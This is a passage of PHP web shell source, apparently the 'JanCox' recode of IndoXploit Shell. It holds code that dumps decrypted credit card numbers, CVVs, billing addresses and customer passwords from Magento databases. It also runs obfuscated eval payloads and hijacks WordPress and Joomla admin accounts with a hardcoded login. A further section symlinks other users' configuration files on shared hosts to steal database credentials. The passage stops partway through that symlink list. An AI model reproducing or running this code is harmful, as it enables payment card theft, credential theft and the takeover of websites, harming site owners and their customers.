  734.             while($rows = mysql_fetch_array($query_smtp)) {  
  735.                 $smtphost = $rows[0];  
  736.                 $smtpport = $rows[1];  
  737.                 $smtpuser = $rows[2];  
  738.                 $smtppass = $rows[3];  
  739.                 echo "<tr><pre><td>$no</td><td>$smtphost</td><td>$smtpport</td><td>$smtpuser</td><td>$smtppass</td></pre></tr>";  
  740.                 $no++;  
  741.             }  
  742.         echo "</table><br>";  
  743.     }  
  744.     //=========================================================================================================  
  745.     $query = mysql_query("SELECT sfo.updated_at,sfo.cc_owner,sfo.method,sfo.cc_number_enc,sfo.cc_cid_enc,CONCAT(sfo.cc_exp_month,' |',sfo.cc_exp_year) as exp,CONCAT(billing.firstname,' | ',billing.lastname,' | ',billing.street,' | ',billing.city,' | ', billing.region,' | ',billing.postcode,' | ',billing.country_id,' | ',billing.telephone,' |-| ',billing.email) AS 'Billing Address' FROM sales_flat_quote_payment AS sfo JOIN sales_flat_quote_address AS billing ON billing.quote_id = sfo.quote_id AND billing.address_type = 'billing'");  
  746.     $query2 = mysql_query("SELECT sfo.cc_owner,sfo.method,sfo.cc_number_enc,sfo.cc_cid_status,CONCAT(sfo.cc_exp_month,'|',sfo.cc_exp_year) as exp,CONCAT(billing.firstname,' | ',billing.lastname,' | ',billing.street,' | ',billing.city,' | ', billing.region,' | ',billing.postcode,' | ',billing.country_id,' | ',billing.telephone,' | ',billing.email) AS 'Billing Address' FROM sales_flat_order_payment AS sfo JOIN sales_flat_order_address AS billing ON billing.parent_id = sfo.parent_id AND billing.address_type = 'billing' where cc_number_enc != ''");
  747.     if(mysql_num_rows($query) != 0 || mysql_num_rows($query2) != 0){  
  748.           echo'<br><br>  
  749.                 ====================================================================<br>  
  750.                                 [ Credit Card ] <br>  
  751.                 ====================================================================<br>';  
  752.             echo "  
  753.             <table border='1' align='left' >  
  754.             <tr>  
  755.             <td>no</td>  
  756.             <td>Date</td>  
  757.             <td>Credit Owner</td>  
  758.             <td>method</td>  
  759.             <td>Credit Number</td>  
  760.             <td>Credit Exp</td>  
  761.             <td>CVV</td>  
  762.             <td>Address</td>  
  763.             </tr>";  
  764.                 $no = 1;  
  765.                 $batas = 0;  
  766.                 while($vx = mysql_fetch_array($query)){  
  767.                 $date = $vx['updated_at'];  
  768.                 $cc_owner = $vx['cc_owner'];  
  769.                 $method = $vx['method'];  
  770.                 $cc_number_enc = $crypto->decrypt($vx['cc_number_enc']);  
  771.                 $exp = $vx['exp'];          
  772.                 $cc_cid_enc = $crypto->decrypt($vx['cc_cid_enc']);      
  773.                 $Billing_Address = $vx['Billing Address'];  
  774.                 echo "<tr><pre><td>$no</td><td>$date</td><td>$cc_owner</td><td>$method</td><td>$cc_number_enc</td><td>$exp</td><td>$cc_cid_enc</td><td>$Billing_Address</td></pre></tr>";  
  775.                 $batas = $no++;  
  776.                 }  
  777.                  
  778.                 while($vx2 = mysql_fetch_array($query2)){  
  779.                     $batas +=1;  
  780.                 $cc_owner = $vx2['cc_owner'];  
  781.                 $method = $vx2['method'];  
  782.                 $cc_number_enc = $crypto->decrypt($vx2['cc_number_enc']);  
  783.                 $exp = $vx2['exp'];          
  784.                 $cc_cid_status = $crypto->decrypt($vx2['cc_cid_status']);  
  785.                 $Billing_Address = $vx2['Billing Address'];  
  786.                 echo "<tr><pre><td>$batas</td><td>$cc_owner</td><td>$method</td><td>$cc_number_enc</td><td>$exp</td><td>$cc_cid_status</td><td>$Billing_Address</td></pre></tr>";  
  787.                  $batas++;  
  788.                 }      
  789.                  
  790.             echo "</table><br>";      
  791.     }  
  792.     //=========================================================================================================  
  793.     $query = mysql_query("SELECT email,value FROM customer_entity_varchar, customer_entity WHERE customer_entity_varchar.entity_id = customer_entity.entity_id and attribute_id=12");  
  794.     $query2 = mysql_query("SELECT customer_email,password_hash FROM sales_flat_quote");  
  795.      
  796.      
  797.     if(mysql_num_rows($query) != 0 || mysql_num_rows($query2) != 0 ){  
  798.         if (!$query){  
  799.               echo "<center><b>Gagal</b></center>";  
  800.         }else{  
  801.               echo'<br><br>  
  802.                     ====================================================================<br>  
  803.                                     [ Customer ] <br>  
  804.                     ====================================================================<br>';  
  805.         }  
  806.         echo "  
  807.         <table border='1' align='center' >  
  808.         <tr>  
  809.         <td>no</td>  
  810.         <td>user</td>  
  811.         <td>pass</td>      
  812.         </tr>";  
  813.             $no = 1;  
  814.             $batas = 0;  
  815.             while($vx = mysql_fetch_array($query)) {  
  816.                 $user = $vx['email'];  
  817.                 $pass = $vx['value'];  
  818.                 echo "<tr><pre><td>$no</td><td>$user</td><td>$pass</td></pre></tr>";  
  819.                 $batas = $no++;  
  820.             }  
  821.              
  822.             if(mysql_num_rows($query2) != 0 && ($query2)){  
  823.                 while($vx2 = mysql_fetch_array($query2)){  
  824.                     $user = $vx2['customer_email'];  
  825.                     $pass = $crypto->decrypt($vx2['password_hash']);  
  826.                     if(!empty($user) && !empty($pass)){ //tampilin ketika datanya itu ada klo gk ada ya jangan di tampiin  
  827.                         $batas +=1;  
  828.                         echo "<tr><pre><td>$batas</td><td>$user</td><td>$pass</td></pre></tr>";  
  829.                         $batas++;  
  830.                     }  
  831.                 }                  
  832.             }  
  833.          
  834.         echo "</table><br>";  
  835.     }  
  836.     //=========================================================================================================  
  837.   }  
  838. }  
  839. function save($format,$data){  
  840.     $fp = fopen($format, 'a');  
  841.     fwrite($fp, $data);  
  842.     fclose($fp);  
  843. }  
  844. function cekbase64($string){  
  845.         $decoded = base64_decode($string, true);  
  846.         if (!preg_match('/^[a-zA-Z0-9\/\r\n+]*={0,2}$/', $string)) return false;  
  847.         if(!base64_decode($string, true)) return false;  
  848.         if(base64_encode($decoded) != $string) return false;  
  849.         return true;//nilai return 1 jika true  
  850.     }  
  851. //----untuk decode password ---/  
  852. class Varien_Crypt_Mcrypt{  
  853.     /**  
  854.      * Constuctor  
  855.      *  
  856.      * @param array $data  
  857.      */  
  858.     public function __construct()  
  859.     {  
  860.     }  
  861.  
  862.     /**  
  863.      * Initialize mcrypt module  
  864.      *  
  865.      * @param string $key cipher private key  
  866.      * @return Varien_Crypt_Mcrypt  
  867.      */  
  868.     public function init($key)  
  869.     {  
  870.         $this->handler = mcrypt_module_open(MCRYPT_BLOWFISH, '', MCRYPT_MODE_ECB, '');  
  871.         $iv = mcrypt_create_iv (mcrypt_enc_get_iv_size($this->handler), MCRYPT_RAND);  
  872.         $maxKeySize = mcrypt_enc_get_key_size($this->handler);  
  873.  
  874.         if (iconv_strlen($key, 'UTF-8')>$maxKeySize) {  
  875.             //throw new Varien_Exception('Maximum key size must should be smaller '.$maxKeySize);  
  876.             return null;  
  877.         }  
  878.  
  879.         mcrypt_generic_init($this->handler, $key, $iv);  
  880.  
  881.         return $this;  
  882.     }  
  883.  
  884.     /**  
  885.      * Encrypt data  
  886.      *  
  887.      * @param string $data source string  
  888.      * @return string  
  889.      */  
  890.     public function encrypt($data)  
  891.     {  
  892.         if (!$this->handler) {  
  893.             //throw new Varien_Exception('Crypt module is not initialized.');  
  894.             return null;  
  895.         }  
  896.         if (strlen($data) == 0) {  
  897.             return $data;  
  898.         }  
  899.         return base64_encode(mcrypt_generic($this->handler, $data));  
  900.     }  
  901.  
  902.     /**  
  903.      * Decrypt data  
  904.      *  
  905.      * @param string $data encrypted string  
  906.      * @return string  
  907.      */  
  908.     public function decrypt($data)  
  909.     {  
  910.         if (!$this->handler) {  
  911.             //throw new Varien_Exception('Crypt module is not initialized.');  
  912.             return null;  
  913.         }  
  914.         if (strlen($data) == 0) {  
  915.             return $data;  
  916.         }  
  917.         return mdecrypt_generic($this->handler, base64_decode($data));  
  918.     }  
  919.          
  920.    
  921.     /**  
  922.      * Desctruct cipher module  
  923.      *  
  924.      */  
  925.     public function __destruct()  
  926.     {  
  927.         if ($this->handler) {  
  928.             $this->_reset();  
  929.         }  
  930.     }  
  931.  
  932.     protected function _reset()  
  933.     {  
  934.         mcrypt_generic_deinit($this->handler);  
  935.         mcrypt_module_close($this->handler);  
  936.     }  
  937. }  
  938. }
  939. elseif($_GET['do'] == 'zip') {
  940.     echo "<center><h1>Zip Menu</h1>";
  941. function rmdir_recursive($dir) {
  942.     foreach(scandir($dir) as $file) {
  943.        if ('.' === $file || '..' === $file) continue;
  944.        if (is_dir("$dir/$file")) rmdir_recursive("$dir/$file");
  945.        else unlink("$dir/$file");
  946.    }
  947.    rmdir($dir);
  948. }
  949. if($_FILES["zip_file"]["name"]) {
  950.     $filename = $_FILES["zip_file"]["name"];
  951.     $source = $_FILES["zip_file"]["tmp_name"];
  952.     $type = $_FILES["zip_file"]["type"];
  953.     $name = explode(".", $filename);
  954.     $accepted_types = array('application/zip', 'application/x-zip-compressed', 'multipart/x-zip', 'application/x-compressed');
  955.     foreach($accepted_types as $mime_type) {
  956.         if($mime_type == $type) {
  957.             $okay = true;
  958.             break;
  959.         }
  960.     }
  961.     $continue = strtolower($name[1]) == 'zip' ? true : false;
  962.     if(!$continue) {
  963.         $message = "Itu Bukan Zip  , , GOBLOK COK";
  964.     }
  965.   $path = dirname(__FILE__).'/';
  966.   $filenoext = basename ($filename, '.zip');
  967.   $filenoext = basename ($filenoext, '.ZIP');
  968.   $targetdir = $path . $filenoext;
  969.   $targetzip = $path . $filename;
  970.   if (is_dir($targetdir))  rmdir_recursive ( $targetdir);
  971.   mkdir($targetdir, 0777);
  972.     if(move_uploaded_file($source, $targetzip)) {
  973.         $zip = new ZipArchive();
  974.         $x = $zip->open($targetzip);
  975.         if ($x === true) {
  976.             $zip->extractTo($targetdir);
  977.             $zip->close();
  978.  
  979.             unlink($targetzip);
  980.         }
  981.         $message = "<b>Sukses Gan :)</b>";
  982.     } else {   
  983.         $message = "<b>Error Gan :(</b>";
  984.     }
  985. }  
  986. echo '<table style="width:100%" border="1">
  987.   <tr><td><h2>Upload And Unzip</h2><form enctype="multipart/form-data" method="post" action="">
  988. <label>Zip File : <input type="file" name="zip_file" /></label>
  989. <input type="submit" name="submit" value="Upload And Unzip" />
  990. </form>';
  991. if($message) echo "<p>$message</p>";
  992. echo "</td><td><h2>Zip Backup</h2><form action='' method='post'><font style='text-decoration: underline;'>Folder:</font><br><input type='text' name='dir' value='$dir' style='width: 450px;' height='10'><br><font style='text-decoration: underline;'>Save To:</font><br><input type='text' name='save' value='$dir/cox_backup.zip' style='width: 450px;' height='10'><br><input type='submit' name='backup' value='BackUp!' style='width: 215px;'></form>";  
  993.     if($_POST['backup']){
  994.     $save=$_POST['save'];
  995.     function Zip($source, $destination)
  996. {
  997.     if (extension_loaded('zip') === true)
  998.     {
  999.         if (file_exists($source) === true)
  1000.         {
  1001.             $zip = new ZipArchive();
  1002.  
  1003.             if ($zip->open($destination, ZIPARCHIVE::CREATE) === true)
  1004.             {
  1005.                 $source = realpath($source);
  1006.  
  1007.                 if (is_dir($source) === true)
  1008.                 {
  1009.                     $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source), RecursiveIteratorIterator::SELF_FIRST);
  1010.  
  1011.                     foreach ($files as $file)
  1012.                     {
  1013.                         $file = realpath($file);
  1014.  
  1015.                         if (is_dir($file) === true)
  1016.                         {
  1017.                             $zip->addEmptyDir(str_replace($source . '/', '', $file . '/'));
  1018.                         }
  1019.  
  1020.                         else if (is_file($file) === true)
  1021.                         {
  1022.                             $zip->addFromString(str_replace($source . '/', '', $file), file_get_contents($file));
  1023.                         }
  1024.                     }
  1025.                 }
  1026.  
  1027.                 else if (is_file($source) === true)
  1028.                 {
  1029.                     $zip->addFromString(basename($source), file_get_contents($source));
  1030.                 }
  1031.             }
  1032.  
  1033.             return $zip->close();
  1034.         }
  1035.     }
  1036.  
  1037.     return false;
  1038. }
  1039.     Zip($_POST['dir'],$save);
  1040.     echo "Done , Save To <b>$save</b>";
  1041.     }
  1042.     echo "</td><td><h2>Unzip Manual</h2><form action='' method='post'><font style='text-decoration: underline;'>Zip Location:</font><br><input type='text' name='dir' value='$dir/file.zip' style='width: 450px;' height='10'><br><font style='text-decoration: underline;'>Save To:</font><br><input type='text' name='save' value='$dir/cox_unzip' style='width: 450px;' height='10'><br><input type='submit' name='extrak' value='Unzip!' style='width: 215px;'></form>";
  1043.     if($_POST['extrak']){
  1044.     $save=$_POST['save'];
  1045.     $zip = new ZipArchive;
  1046.     $res = $zip->open($_POST['dir']);
  1047.     if ($res === TRUE) {
  1048.         $zip->extractTo($save);
  1049.         $zip->close();
  1050.     echo 'Succes , Location : <b>'.$save.'</b>';
  1051.     } else {
  1052.     echo 'Gagal Mas :( Ntahlah !';
  1053.     }
  1054.     }
  1055. echo '</tr></table>';  
  1056.     }
  1057.     elseif($_GET['do'] == 'shellchk') {
  1058.         eval(str_rot13(gzinflate(str_rot13(base64_decode(('vUddQtswFH1epf4HcCE1VUxbNvEwdSMGd9FeJtGhPaygyLZ5B6jc5AaHORP/fdf5IoXxsBeiSbGdZu491z6+cTiA1GVPdCkwDTIaDnM5lyVupoT5Nc1ymWWmWpZdRm9FXWOGqzguTlue4Utjpa+p53a411OCIcKZFCxqGVUES63F8XGSylAx3jr+oATX45SXE3LBubGwAsM16RLpY5Jlp+aHh1RR8jscWaPZpI0dzbay/hdZJJqkziiFUZV5t5ohSmIE1POy0M+Bl+381rjEL1whj5xmh/kwvC85oifDTp6wqlXyADr2ynAJKJgpiEaeTrCvLaDIA/J0OCD47FswS6Yi85pEzzrYVoNF2ujEg0OX0jJ1duvpWlW+hORmhxQIElNvPuS/inBksxEA98JsNaPjRIiU9civj2FpYL5jhElwWdN8KmUSZ3fm5NNn2pVFMWILSHUuPTFerhbfSYs1Xax+nV2s4u+Xl4slegNI6MckWBxvdmiUx6SRWHUftOXZ5jWmD/Gi9qAUbdMVvKPKP6elKVxA1QayIrWnG3A59y6ibiMjrDMd9OI+9UfcyU9QsvB3W5VwT4eDHam5xc85F8ACd40q3EvfeMxADe3HzatgAcLD58AhwYNoyOxJDvqc5pYhhrOHCO8Y097nXM6vJACLfvCEct6IWaMfGxj5VXOGSwk5Opai4J5n72gj0Wfza+sM+x29+D6bR5eFWaK2xCcCQcELBxy9Y8DbOjFY2nF26JjF88lC3zmYZHEJ8hYkTFaJFtp7j3dpzPvfdKxZKYx9j1CWkFJfuSbvZMzDAf78MRdXgQ724/Oz5cVtR7dA7BK95oW9TvX6id8rrLYhYIaupzSEqntthpHSeYK2aXmfYEWLxqojGkjH3mRJcryqge1uN6CvYvgbLZdJJPqPi928ml2vNqHd+yU4Q6botthiDsI//AU='))))));
  1059.     } elseif($_GET['do'] == 'loghunter')
  1060.     {eval(str_rot13(gzinflate(str_rot13(base64_decode(("tUl7YtpVEP87VXyHiZMr0BLsPJqqgJ14QyBquuNrXEUlEExeeL2E5hZ7wS5pmu9+s7ZWgDM5RCmWJXt0f7Pz3JnJ52lphOsTQ+odbjFOjaGl1CCfWIlGTyPgLguIpQ+VoQKRYD7x8N8mDhsqC/iZRJ9DoxtDqNYDyx4xYA+20BUmvjEF7mw4wlL9WZ8J5o69b6lpcyhg8Qipju+aXkAVo35z+/az5KVGhoozmlEBilhLltbJyVCl6WULvpDx7kNE11lDpQ14NJsKY9hQKEyligc8DHNJFU8xcrXUKgRGV6hWhVooC6xMRCshRH2fz31OLQCfKtyQGVyNpOOg+DflE+hSPAhY+VyXsxRlZ6p3x+qRaWsK2sfqx3B13OZmN4E1QrZ9xuyqqkG5KyaEzCsuidTJdfbJEWEGzOYOE5PAim4j1fEJ/eSOSz7XHm5cqFE2n3bv1XwO4jeYFvfNxmyzNSgkrivclR7zuenIilALjFRpEM65SNzHY2A0nGubQ8Fdv+igZpH2sgfcAblAO6Vpj8lUPkUQYezqhVcB3r2DxaJFKL2AlvDykRjQbmRtpXt90eu0zi/+MJu9U/uijb8VuUxbclBEsBs45k+zkpS3K6iYBVLFaBylnOgI0hRL5Y3FQXRZfmiYBqEwMTNal2AkLeYk59Uya4KEVgfxLZhvd2PP9Djjmxm+i3WCbKyD0jm/ely2bV0lC8ZrMI/PSC4dTjskikOPWSQKiiRBlYk2KBQLancWQQZPKjtVNbgbxDLisK9w5ZNcjAFea4uBWE9P9T1a6/e7mtFxb8YtIi+SxYw7S8EcHX4+7R8bVxyhipKCcTHI0urpvyS8ijMz4sz1Wh6GxcLeoH3wp2nwmR/8RjF/+WNj9+FKVsElEitlvUooy9iV913ikmym133XiZ2pQbgjQUJZQrjEE5mO2peRjLGrIc0EvygbVDwqA/c8J+SOLzB2Q6kSJp0MzIZnS+ZUHcuQxS8P5vT/2KW2meKRHbey2DEnkutEuHe1GtDBZRMI6HD2F8rxaCjBjx+QTxpKDfidRgsLX/VsOyt7Mm/6IohStil49uKEetKv3+73D0KMWDsk3BP0jfIvrUvo8YG21e3o94+7mnP8FXTYGyqXptOW2vVBNe2kdNwiZh+r/Ns6D/N6WPV+vrTAT8slKBWe8WvLrREPoeMLav70RqakveP7ZuvYcdErllZIvvJ77rg0sNlJhj1PnYNCxUdCm/1rPK6MLByKKpbARIhG7ES6OQm5NTdvM7826yo34HbLiMVo85WApX0fXpBkw5+LB9CNtD7hkLPex0rFQBHbKs5S5j2nxQVCGfrXN63ehflb++a622H1zN56+/qm9OpMGzw9o09LDyIMydh1CsuTqb6lvxOKR6yiefbiK97cQF4lre4/idARGdaujmDr5XvpxPQXP/guZC3mu3GcxgGvFiMWRjD2jvXBa3biz+dp/gU="))))));}  
  1061. elseif($_GET['do'] == 'metu') {
  1062.    
  1063.  
  1064. echo '<form action="?dir=$dir&do=metu" method="post">';
  1065.     unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  1066.     echo 'Byee !';
  1067.    
  1068. }
  1069. elseif($_GET['do'] == 'about') {
  1070.    
  1071.     echo '<center>JanCox Shell<hr>IndoXploit Shell Recoded By 0x1999<br>For More Script Visit <a href="http://cr1p.blogspot.com/">Here</a>';
  1072.    
  1073. }
  1074. elseif($_GET['do'] == 'auto_cu_wp') {
  1075. if($_POST['gass']) {
  1076.     echo "<center><h1>WordPress Auto Change User 2</h1>
  1077.         <form method='post'>
  1078.         Link Config: <br>
  1079.         <textarea name='link' style='width: 450px; height:250px;'>";
  1080.     UrlLoop($_POST['linkconf'],'wordpress');   
  1081.     echo"</textarea><br>
  1082.         <input type='submit' style='width: 450px;' name='auto_cu_wp' value='Hajar!!'>
  1083.         </form></center>";
  1084. }   else {
  1085.         echo "<center><h1>WordPress Auto Change User 2</h1>
  1086.         <form method='post'>
  1087.         Link Config: <br>
  1088.         <input type='text' name='linkconf' height='10' size='50' placeholder='http://link.com/cox_symconf/'><br>
  1089.         <input type='submit' style='width: 450px;' name='gass' value='Hajar!!'>
  1090.         </form></center>";
  1091.     }
  1092. if($_POST['auto_cu_wp']) {
  1093.    
  1094.         function anucurl($sites) {
  1095.             $ch = curl_init($sites);
  1096.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1097.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1098.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1099.                   curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  1100.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1101.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1102.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1103.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1104.                   curl_setopt($ch, CURLOPT_COOKIESESSION,true);
  1105.             $data = curl_exec($ch);
  1106.                   curl_close($ch);
  1107.             return $data;
  1108.         }
  1109.         $link = explode("\r\n", $_POST['link']);
  1110.         $user = "0x1999";
  1111.         $pass = "0x1999";
  1112.         $passx = md5($pass);
  1113.         foreach($link as $dir_config) {
  1114.             $config = anucurl($dir_config);
  1115.             $dbhost = ambilkata($config,"DB_HOST', '","'");
  1116.             $dbuser = ambilkata($config,"DB_USER', '","'");
  1117.             $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  1118.             $dbname = ambilkata($config,"DB_NAME', '","'");
  1119.             $dbprefix = ambilkata($config,"table_prefix  = '","'");
  1120.             $prefix = $dbprefix."users";
  1121.             $option = $dbprefix."options";
  1122.             $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1123.             $db = mysql_select_db($dbname);
  1124.             $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1125.             $result = mysql_fetch_array($q);
  1126.             $id = $result[ID];
  1127.             $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1128.             $result2 = mysql_fetch_array($q2);
  1129.             $target = $result2[option_value];
  1130.             if($target == '') {                
  1131.                 echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
  1132.             } else {
  1133.                 echo "<font color=blue>[</font> $target <font color=blue>]</font></font><br>";
  1134.             }
  1135.             $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  1136.             if(!$conn OR !$db OR !$update) {
  1137.                 echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  1138.                 mysql_close($conn);
  1139.             } else {
  1140.                     echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  1141.                     echo "[+] username: <font color=lime>$user</font><br>";
  1142.                     echo "[+] password: <font color=lime>$pass</font><br><br>";    
  1143.                    
  1144.                 mysql_close($conn);
  1145.             }
  1146.         }
  1147.     }  
  1148.  
  1149. }
  1150. elseif($_GET['do'] == 'auto_cu_joomla') {
  1151. if($_POST['gass']) {
  1152.     echo "<center><h1>Joomla Auto Change User 2</h1>
  1153.         <form method='post'>
  1154.         Link Config: <br>
  1155.         <textarea name='link' style='width: 450px; height:250px;'>";
  1156.     UrlLoop($_POST['linkconf'],'joomla');  
  1157.     echo"</textarea><br>
  1158.         <input type='submit' style='width: 450px;' name='auto_cu_joomla' value='Hajar!!'>
  1159.         </form></center>";
  1160. }   else {
  1161.         echo "<center><h1>Joomla Auto Change User 2</h1>
  1162.         <form method='post'>
  1163.         Link Config: <br>
  1164.         <input type='text' name='linkconf' height='10' size='50' placeholder='http://link.com/cox_symconf/'><br>
  1165.         <input type='submit' style='width: 450px;' name='gass' value='Hajar!!'>
  1166.         </form></center>";
  1167.     }
  1168. if($_POST['auto_cu_joomla']) {
  1169.    
  1170.         function anucurl($sites) {
  1171.             $ch = curl_init($sites);
  1172.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1173.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1174.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1175.                   curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  1176.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1177.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1178.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1179.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1180.                   curl_setopt($ch, CURLOPT_COOKIESESSION,true);
  1181.             $data = curl_exec($ch);
  1182.                   curl_close($ch);
  1183.             return $data;
  1184.         }
  1185.         $link = explode("\r\n", $_POST['link']);
  1186.         $user = "0x1999";
  1187.         $pass = "0x1999";
  1188.         $passx = md5($pass);
  1189.         foreach($link as $dir_config) {
  1190.             $config = anucurl($dir_config);
  1191.                     $dbhost = ambilkata($config,"host = '","'");
  1192.                     $dbuser = ambilkata($config,"user = '","'");
  1193.                     $dbpass = ambilkata($config,"password = '","'");
  1194.                     $dbname = ambilkata($config,"db = '","'");
  1195.                     $dbprefix = ambilkata($config,"dbprefix = '","'");
  1196.                     $prefix = $dbprefix."users";
  1197.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1198.                     $db = mysql_select_db($dbname);
  1199.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1200.                     $result = mysql_fetch_array($q);
  1201.                     $id = $result['id'];
  1202.                     $site = ambilkata($config,"sitename = '","'");
  1203.                     $update = mysql_query("UPDATE $prefix SET username='$user',password='$passx' WHERE id='$id'");
  1204.                     echo "Config => ".$dir_config."<br>";
  1205.                     echo "CMS => Joomla<br>";
  1206.                     if($site == '') {
  1207.                         echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
  1208.                     } else {
  1209.                         echo "Sitename => $site<br>";
  1210.                     }
  1211.                     if(!$update OR !$conn OR !$db) {
  1212.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1213.                     } else {
  1214.                         echo "Status => Done , Username : <font color=lime>$user</font> Password : <font color=lime>$pass</font><br><br>";
  1215.                     }
  1216.                     mysql_close($conn);
  1217.                     }
  1218.     }  
  1219. }
  1220. elseif($_GET['do'] == 'symconfig') {
  1221. if(strtolower(substr(PHP_OS, 0, 3)) == "win"){
  1222. echo '<script>alert("Skid this won\'t work on Windows")</script>';
  1223. exit;
  1224. }
  1225. else
  1226. {
  1227. if($_POST["m"] && !$_POST["passwd"]==""){
  1228. @mkdir("cox_symconf", 0777);
  1229. @chdir("cox_symconf");
  1230. @symlink("/","root");
  1231. $htaccess="Options Indexes FollowSymLinks
  1232. DirectoryIndex jancox.htm
  1233. AddType text/plain .php
  1234. AddHandler text/plain .php
  1235. Satisfy Any";
  1236. @file_put_contents(".htaccess",$htaccess);
  1237. $etc_passwd=$_POST["passwd"];
  1238. $etc_passwd=explode("\n",$etc_passwd);
  1239. foreach($etc_passwd as $passwd){
  1240. $pawd=explode(":",$passwd);
  1241. $user =$pawd[0];
  1242.  
  1243. @symlink('/','cox_symconf/root');
  1244. @symlink('/home/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  1245. @symlink('/home/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  1246. @symlink('/home/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  1247. @symlink('/home/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  1248. @symlink('/home/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  1249. @symlink('/home/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  1250. @symlink('/home/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  1251. @symlink('/home/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  1252. @symlink('/home/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  1253. @symlink('/home/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  1254. @symlink('/home/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  1255. @symlink('/home/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  1256. @symlink('/home/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  1257. @symlink('/home/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  1258. @symlink('/home/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  1259. @symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  1260. @symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  1261. @symlink('/home/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  1262. @symlink('/home/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  1263. @symlink('/home/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  1264. @symlink('/home/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  1265. @symlink('/home/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  1266. @symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  1267. @symlink('/home/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  1268. @symlink('/home/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  1269. @symlink('/home/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  1270. @symlink('/home/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  1271. @symlink('/home/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  1272. @symlink('/home/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  1273. @symlink('/home/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  1274. @symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  1275. @symlink('/home/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  1276. @symlink('/home/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  1277. @symlink('/home/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  1278. @symlink('/home/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  1279. @symlink('/home/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  1280. @symlink('/home/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  1281. @symlink('/home/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  1282. @symlink('/home/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  1283. @symlink('/home/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  1284. @symlink('/home/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  1285. @symlink('/home/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
